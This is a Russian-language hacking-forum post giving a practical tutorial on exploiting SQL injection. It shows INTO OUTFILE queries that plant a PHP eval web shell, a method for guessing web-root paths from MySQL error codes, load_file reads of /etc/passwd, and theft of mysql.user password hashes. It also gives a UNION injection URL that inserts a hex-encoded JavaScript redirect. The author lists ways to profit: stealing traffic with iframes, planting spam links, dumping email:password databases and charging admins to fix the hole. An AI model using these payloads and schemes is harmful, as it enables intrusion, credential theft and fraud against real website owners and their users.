Выжимаем максимум из sql-inj - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

Все инфопродукты и приватная информация бесплатно

Вернуться   Proxy-Base Community - Анонимность и безопасность в интернете. > Proxy-Base - Information > Наши проекты, статьи, релизы

Ответ
 
LinkBack Опции темы Поиск в этой теме Опции просмотра
Старый 04.12.2012, 00:06   #1 (permalink)
SOCKS4
 
Регистрация: 05.06.2010
Сообщений: 168
Member ID: 8025

Репутация: 265
Репутация: 265
Сказал(а) спасибо: 76
Поблагодарили 89 раз(а) в 41 сообщениях
Топикстартер (автор темы) По умолчанию Выжимаем максимум из sql-inj

mh-coder ето я, когда дочитаете до низу поймёте зачем я ето наисал!
я не русский, русский никогда не учил, ошибки старался не делать если увидите - не обращайте внимания!

Всем привет, сегодня я разскажу о том как выжимают из данной дыры максимум пользы со всеми их нюансами.

Я не буду учить вас крутить скули так как об этом уже написано полно статей, мы просто будем учится заливать шеллы со всеми нюансами, а также выжимать пользу если шелл залить нельзя.

Итак, залить шелл можно двумя способами, непосредственно через mysql или через админ панель.

Заливка через админ панель не всегда катит, так как встречаются такие нюансы как нету админки, нету в админ панели возможности залиится

Опишу варианты то что можно сделать когда есть админка и нет возможности залится:

- если на сайте есть трафф то ищем кугда можно влепить фрейм, ставим его и сливаем трафф.
- если нет траффа а есть тиц и пр то ищем старые новости или статьи на сайте то лепим ссылку на свой сайт(дор), также можно продавать ссылки.
- если нет ни траффа ни пузомерок то можно отписать админу и предложить за вознагрождение залатать дыру.

С админкой закончили, перейдём к заливке черз mysql.

Тут есть два варианта, есть доступ в mysql.user и нету доступа в mysql.user

Наконец первый вариант когда есть доступ в mysql.user.

Что нужно чтобы залить шелл?

- file_priv = Y
- отсутствие фильтрации ковычек
- знать полный путь
- иметь права на папке для заливки

надеюсь запрос для заливки шелла вам напоминаит не нужно, но я таки напомню
PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile 'полный путь/shell.php'
Начнём с третего нюанса полный путь.

Я из своего опыта скажу так, пути восновном всегда однотипные, поэтому я всегда когда заливаю шелл или когда вижу какую нибуть ошибку записываю пути в файл, чтобы потом по их примеру подбирать путь на нужном мне сайте.

Вот вам примеры путей

внимательней читайте особенно обратите внимание где домен а где домен.ru(в вашем варианте может быть любой другой)
или user так как ети строки будут в вашем варианте другие

/var/www/домен/data/www/домен.ru/
/var/www/admin/data/www/домен.ru/
/home/opt/домен/www/forum/html/
/var/www/virtual_client/burdin/www/
/home/домен/public_html/
/www/vhosts/домен.ru/html/
/usr/home/www/домен.ru/htdocs/
/home/домен/domains/домен.ru/public_html/
/usr/home/домен/htdocs/
/var/www/html/domain/домен.ru/
/srv/www/домен.ru/
/home/users/user/domains/домен.ru/
/var/www/vhosts/домен.ru/httpdocs/
/var/www/html/hosts/домен.ru/cgi-bin/
/home/users/domains/домен.ru/
/usr/local/www/lib/go.php
/usr/local/www/apache22/data/домен.ru/
/home/admin/data/www/домен.ru/
/var/www/vhosts/домен.ru/httpdocs/
/var/www/hq/data/www/домен.ru/
/var/www/virtual_client/ridel-holding/www/
/space/home/clients/websites/w_80200/домен.ru/public_html/
/home/www/user/sites/домен.ru/htdocs/

Итак домен.ru думаю понятно, ето домен сайта которого ломаете. в какмто песте он может состоять из домена второго и первого уровня в какомто только из второго.

user ето имя узера, такое встречается на платных хостингах, их мы можем взять из файла passwd выполнив такой запрос

PHP код:
select load_file('/etc/passwd'
Далее обьясню как наугад(а иначе никак) подбирать полный путь.

Обьясню сразу, есть 3 варианта, первый в ошбке цифра 2 - значит путь неправельный, 13 - путь правельный но нет прав на папке, нет ошибки - наш шелл залит,

и так следите за логикой

пишем запрос

PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/home/shell.php'
в ответе

Цитата:
Can't create/write to file '/home/shell.php' (Errcode: 2)
2, начало уже не подходит

вместо home берём var

PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/shell.php'
в ответе

Цитата:
Can't create/write to file '/var/shell.php' (Errcode: 13)
опа, цифра 13, путь правельный но прав пока нету, идём дальше, вибираем из предложеного мною списка все варианты что идут после var а именно www

PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/www/shell.php'
в ответе

Цитата:
Can't create/write to file '/var/www/shell.php' (Errcode: 13)
13, правильно идём, возьмём дальше html


PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/www/html/shell.php'
в ответе

Цитата:
Can't create/write to file '/var/www/html/shell.php' (Errcode: 2)
ответ 2, значит html не подходит, берём домен,

PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/www/домен/shell.php'
в ответе

Цитата:
Can't create/write to file '/var/www/домен/shell.php' (Errcode: 13)
13, путь правельный и мы уже близко к главному каталогу

не буду тянуть ставим сразу

PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/www/домен/data/www/домен.ru/shell.php'
в ответе

Цитата:
Can't create/write to file '/var/www/домен.ru/data/www/домен.ru/shell.php' (Errcode: 13)
воаля, по интуиции уже можно впринципи понять что мы уже в главном каталоге, как проверить? идём на сайт, ищем какую нибуть папку напрмер с картинками images


PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/www/домен/data/www/домен.ru/images/shell.php'
в ответе

Цитата:
Can't create/write to file '/var/www/домен.ru/data/www/домен.ru/images/shell.php' (Errcode: 13)
раз папка открывается значит мы в главном каталоге, теперь ищем папку в которую можно залится, перебирам все найденые папки ну и например находим папку uploads


PHP код:
select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile '/var/www/домен/data/www/домен.ru/uploads/shell.php'
в ответе

Цитата:
пусто
ура шелл залит.

Теперь разберёмся с другими нюансами, а именно фильтрация ковычек, тут делаем так, я вобще начинаю всегда именно с этого момента.
Сливаем инфу из mysql.user в виде host,user,password
для тех кто не знает что хранится в колонке host я обьясняю, тут находится инфа о том откуда можно подключится к этому аккаунту БД, и имеено может бить 4 варианта:

- llocalhost
- ip адресс
- домен
- %

Нас интересует именно четвёртый ваиант знак % - он значит что можно подключится с любого ip, если вам повезло и есть акаунты с етим знаком процента то просто узнаём ip адресс хостинга, разшифровываем хеш, и спокойн через шелл подключаемся, там уже никакой фильтрации нет + мы можем редактировать таблици, вобщем разделяй и властвуй.

или

если на сайте есть дуступ к phpmyadmin то можно заходить и с любого ака( желательно канешно root)

Перейдём к следующим нюансам, нет папки для заливки шелла, тогда :

- если мы нашли юзера с % и подключились к майскул или зашли в phpmyadmin то у нас есть возможность редактировать информацию на сайте которая хранится в БД, в етом случае поступаем также как и в слкчае с доступом в админку, напмню
Цитата:
- если на сайте есть трафф то ищем кугда можно влепить фрейм, ставим его и сливаем трафф.
- если нет траффа а есть тиц и пр то ищем старые новости или статьи на сайте то лепим ссылку на свой сайт(дор), также можно продавать ссылки.
- если нет ни траффа ни пузомерок то можно отписать админу и предложить за вознагрождение залатать дыру.
- если такого юзера нету и нету phpmyadmin то используем оставшиея 3 варианта:

первый это слив базы вида mail:pass

второй можно использовать дыру для спама, тут подробней.

Все кто может занимается или пробовал заниматся спамом знают о жосткоё фильтации почтовиков для зашиты от спама, из-за етого приходится зашумлять текст, также очень жостко фильтруются ссылки, насколько я помню 1000 писем за сутки с одной и тойде ссылкой и письмо и ссылка попадает в чёрный список(маил.ру) может с числом я и ошибаюсь но это вовсе не важно, чем же нам поможет ета уязвимость, а тем что через mysql запрос можно вывести любой текст(код) на странице, тоесть мы можем написать код редиректа на нужный нам сайт и влепить его через mysql, щас покажу пример

код переадресации

PHP код:
<script language="JavaScript"
  
window.location.href "http://mh-proxy.ru/"
</script> 
перекодируем его в хекс

PHP код:
0x3c736372697074206c616e67756167653d224a617661536372697074223e2077696e646f772e6c6f636174696f6e2e68726566203d2022687474703a2f2f6d682d70726f78792e72752f22203c2f7363726970743e 
вставляем на сайт через mysql

PHP код:
http://www.сайт.ru/opinion.htm?id=7)+limit+0,0+union+select+1,2,3,4,0x3c736372697074206c616e67756167653d224a617661536372697074223e2077696e646f772e6c6f636174696f6e2e68726566203d2022687474703a2f2f616e7469636861742e72752f22203c2f7363726970743e,6,7,8,9,10,11,12,13,14--+ 
и получаем перенаправление, таким образом спасая наш сайт, платник или что вам там нужно от спам фильтров.

и третий, последней вариант, если есть пузомерки на домене то такимже образом как више вставляем ссылку на ваш сайт, дор или что там у вас, и кормим ссылку аддурилкам гугла и яндекса))

Ну, на етом всё, спасибо за внимание.

статья написана by mh-coder

Последний раз редактировалось 0ТЕЦ; 05.02.2013 в 18:07.
0ТЕЦ вне форума   Ответить с цитированием
14 пользователя(ей) сказали cпасибо:
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.





DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.